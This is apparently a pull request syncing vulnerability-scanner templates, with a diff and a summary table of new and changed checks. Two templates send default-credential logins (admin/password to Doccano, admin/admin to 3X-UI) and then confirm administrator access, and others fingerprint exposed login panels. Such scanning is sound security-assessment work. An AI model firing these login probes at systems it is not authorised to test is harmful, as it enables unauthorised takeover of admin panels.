+++ b/http/default-logins/doccano-default-login.yaml
@@ -1,5 +1,4 @@
 id: doccano-default-login
-
 info:
   name: Doccano - Default Login
   author: 0x_Akoko
@@ -11,31 +10,43 @@ info:
     - https://doccano.github.io/doccano/
   metadata:
     runzero-match: any(each(service["html.titles"]), {# matches "(?i)doccano"})
-    verified: true
+    fofa-query: title="doccano"
     max-request: 3
-    vendor: doccano
     product: doccano
     shodan-query: http.title:"doccano"
-    fofa-query: title="doccano"
-  tags: doccano,default-login,vuln
-
+    vendor: doccano
+    verified: true
+  tags: default-login,doccano,vuln
 flow: http(1) && http(2) && http(3)
-
 http:
-  - raw:
+  - matchers:
+      - condition: and
+        dsl:
+          - status_code == 200
+          - contains_all(body, "doccano", "/_nuxt/")
+        internal: true
+        type: dsl
+    raw:
       - |
         GET /auth HTTP/1.1
         Host: {{Hostname}}
         Accept: text/html
-
+  - extractors:
+      - internal: true
+        json:
+          - .token
+        name: token
+        part: body
+        type: json
     matchers:
-      - type: dsl
+      - condition: and
         dsl:
-          - 'status_code == 200'
-          - 'contains_all(body, "doccano", "/_nuxt/")'
-        condition: and
-
-  - raw:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains(body, "token")
+        internal: true
+        type: dsl
+    raw:
       - |
         POST /v1/auth-token HTTP/1.1
         Host: {{Hostname}}
@@ -43,36 +54,18 @@ http:
         Accept: application/json
 
         {"username":"admin","password":"password"}
+  - matchers:
+      - condition: and
+        # digest: 4a0a0047304502200f9e1b5af1b737a273023389e1c8a8ce870ffed366b9cd23db7375289984d74f022100db374c36c00160f3e50215faa7c6f8961a3baaf3fdfa5a3bc04867c182b59967:922c64590222798bb761d5b6d8e72950
 
-    matchers:
-      - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "application/json")'
-          - 'contains(body, "token")'
-        condition: and
-
-    extractors:
-      - type: json
-        name: token
-        part: body
-        json:
-          - '.token'
-        internal: true
-
-  - raw:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains_all(body, "\"username\"", "\"is_superuser\"", "admin")
+        type: dsl
+    raw:
       - |
         GET /v1/me HTTP/1.1
         Host: {{Hostname}}
         Authorization: Token {{token}}
         Accept: application/json
-
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "application/json")'
-          - 'contains_all(body, "\"username\"", "\"is_superuser\"", "admin")'
-        condition: and
-

--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -12,7 +12,7 @@ info:
     cwe-id: CWE-798
     cpe: cpe:2.3:a:mhsanaei:3x-ui:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "sign in"})
+    runzero-match: any(each(service["html.titles"]), {# matches "sign in"}) && service["http.head.cookieNames"] matches "^3x-ui$"
     fofa-query: 'title="3x-ui"'
     max-request: 3
     product: 3x-ui

--- a/http/default-logins/xui/3xui-default-login.yaml
+++ b/http/default-logins/xui/3xui-default-login.yaml
@@ -1,0 +1,73 @@
+id: 3xui-default-login
+info:
+  name: 3X-UI - Default Login
+  author: mapioe
+  severity: high
+  description: |
+    Detected 3X-UI contains default credentials admin/admin. An attacker can obtain access to the admin panel and manage VPN configurations, modify data, and execute unauthorized operations.
+  reference:
+    - https://github.com/MHSanaei/3x-ui
+    - https://github.com/MHSanaei/3x-ui/wiki/Installation
+  classification:
+    cwe-id: CWE-798
+    cpe: cpe:2.3:a:mhsanaei:3x-ui:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "sign in"})
+    fofa-query: 'title="3x-ui"'
+    max-request: 3
+    product: 3x-ui
+    shodan-query: '3x-ui http.title:"sign in"'
+    vendor: mhsanaei
+    verified: true
+  tags: 3x-ui,default-login
+variables:
+  username: "admin"
+  password: "admin"
+flow: http(1) && http(2) && http(3)
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    host-redirects: true
+    max-redirects: 3
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "X_UI_BASE_PATH", "<title>3x-ui")'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        GET /csrf-token HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "success")'
+        condition: and
+        internal: true
+    extractors:
+      - type: json
+        name: csrftoken
+        json:
+          - ".obj"
+        internal: true
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Csrf-Token: {{csrftoken}}
+
+        username={{username}}&password={{password}}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "\"success\":true", "msg")'
+        condition: and
+        # digest: 4a0a004730450220262ea4a46884b04598024288506351d5f472afd144068c5e156120557c3c2c76022100a95b0042888a22e7524734e359c3014c815edadc5b7aa042c35e7284efdf559a:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/miniflux-panel.yaml
+++ b/http/exposed-panels/miniflux-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://miniflux.app/docs/index.html
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Sign In - Miniflux"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Sign In - Miniflux"})
     max-request: 1
     product: miniflux
     shodan-query: http.title:"Sign In - Miniflux"

--- a/http/exposed-panels/miniflux-panel.yaml
+++ b/http/exposed-panels/miniflux-panel.yaml
@@ -1,0 +1,39 @@
+id: miniflux-panel
+info:
+  name: Miniflux - Login Panel
+  author: ashish-cybersec
+  severity: info
+  description: |
+    Miniflux is a minimalist and opinionated self-hosted feed reader written in Go. The login panel was detected.
+  reference:
+    - https://miniflux.app/docs/index.html
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Sign In - Miniflux"})
+    max-request: 1
+    product: miniflux
+    shodan-query: http.title:"Sign In - Miniflux"
+    vendor: miniflux
+    verified: true
+  tags: login,miniflux,panel,rss,signin
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Sign In - Miniflux</title>"
+      - type: word
+        part: body
+        words:
+          - 'data-add-subscription-url="/subscribe"'
+          - 'data-refresh-all-feeds-url="/feeds/refresh"'
+        condition: and
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402204f3885636fa2d04f34b0392af6cf2299f0c1ca4b0dacae3172b6bafa9575479a0220775183d73ea5ab5727b04c73c5798abe770cd998ac7820cb474a486955ffa261:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/dahua/dahua-eims-rce.yaml
+++ b/http/vulnerabilities/dahua/dahua-eims-rce.yaml
@@ -13,7 +13,7 @@ info:
       - CWE-77
       - CWE-78
   metadata:
-    runzero-match: service["product"] matches "(?i)大华.EIMS"
+    runzero-match: any(each(service["html.titles"]), {# matches "^eims"})
     fofa-query: <title>eims</title>
     max-request: 1
     verified: true

--- a/http/vulnerabilities/other/ektron-blog-xmlrpc-xxe.yaml
+++ b/http/vulnerabilities/other/ektron-blog-xmlrpc-xxe.yaml
@@ -26,6 +26,7 @@ http:
         dsl:
           - status_code == 200
           - contains(body, "EktronClientManager")
+        internal: true
         type: dsl
     raw:
       - |


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (11)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/cves/2026/CVE-2026-53519.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-34976.yaml` | 🔴 critical | — | — |
| `http/default-logins/xui/3xui-default-login.yaml` | 🟠 high | default-login | — |
| `http/cves/2026/CVE-2026-50160.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-59774.yaml` | 🔴 critical | — | — |
| `http/exposed-panels/miniflux-panel.yaml` | ⚪ info | panel, login | — |
| `http/cves/2024/CVE-2024-13985.yaml` | 🔴 critical | kev, vkev | — |
| `http/cves/2026/CVE-2026-67208.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-30965.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-3395.yaml` | 🟠 high | kev | — |
| `http/cves/2026/CVE-2026-53976.yaml` | 🔴 critical | — | — |

### Existing runZero templates — semantic changes (5)

| Template | Change |
|---|---|
| `http/default-logins/doccano-default-login.yaml` | http: changed |
| `http/cves/2023/CVE-2023-27847.yaml` | http: changed |
| `http/cves/2023/CVE-2023-6750.yaml` | http: changed |
| `http/cves/2023/CVE-2023-3578.yaml` | http: changed |
| `http/vulnerabilities/other/ektron-blog-xmlrpc-xxe.yaml` | http: changed |

### Removed templates with active `runzero-match` (1)

| Template |
|---|
| `http/vulnerabilities/dahua/dahua-eims-rce.yaml` |

---

### ⚠️ Action items (12)

- [x] `http/cves/2024/CVE-2024-13985.yaml` — auto-generated `runzero-match` (kev, vkev critical); please verify
- [x] `http/cves/2026/CVE-2026-30965.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-3395.yaml` — auto-generated `runzero-match` (kev high); please verify
- [x] `http/cves/2026/CVE-2026-34976.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-50160.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-53519.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-53976.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-59774.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-67208.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/default-logins/xui/3xui-default-login.yaml` — auto-generated `runzero-match` (default-login high); please verify
- [x] `http/exposed-panels/miniflux-panel.yaml` — auto-generated `runzero-match` (panel, login info); please verify
- [x] ⚠️ `http/vulnerabilities/dahua/dahua-eims-rce.yaml` — removed upstream; had active `runzero-match`
